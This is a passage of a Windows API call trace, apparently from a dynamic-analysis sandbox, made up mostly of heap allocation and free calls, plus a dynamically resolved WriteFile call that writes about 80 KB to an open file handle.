hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0170.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0170.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0170.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0170.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0170.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0170.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0170.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0170.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0170.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0170.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0170.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0170.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0170.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0170.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0170.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0170.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0170.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0170.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0170.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0170.825] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0170.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0170.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0170.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0170.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0170.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0170.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0170.828] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0170.828] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0170.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0170.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0170.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0170.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0170.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0170.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0170.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0170.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0170.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0170.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0170.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0170.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0170.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0170.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0170.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0170.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0170.829] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0170.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0170.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0170.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0170.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0170.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0170.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0170.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0170.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0170.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0170.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0170.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0170.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0170.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0170.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0170.830] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0170.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0170.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0170.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0170.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0170.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0170.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0170.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0170.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0170.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0170.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0170.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0170.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0170.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0170.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0170.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0170.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0170.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0170.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0170.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0170.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0170.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.832] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0170.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0170.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9b9f70, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0170.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0170.832] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0170.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0170.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0170.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0170.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0170.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0170.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0170.832] WriteFile (in: hFile=0x138, lpBuffer=0x9c5180*, nNumberOfBytesToWrite=0x137a4, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesWritten=0x87eae0*=0x137a4, lpOverlapped=0x0) returned 1 [0170.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0170.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0170.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0170.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0170.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0170.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0170.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0170.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0170.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0170.834] FreeLibrary (hLibModule=0x75990000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0170.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0170.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0170.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0170.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0170.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0170.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0170.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0170.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0170.835] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.835] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0170.835] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 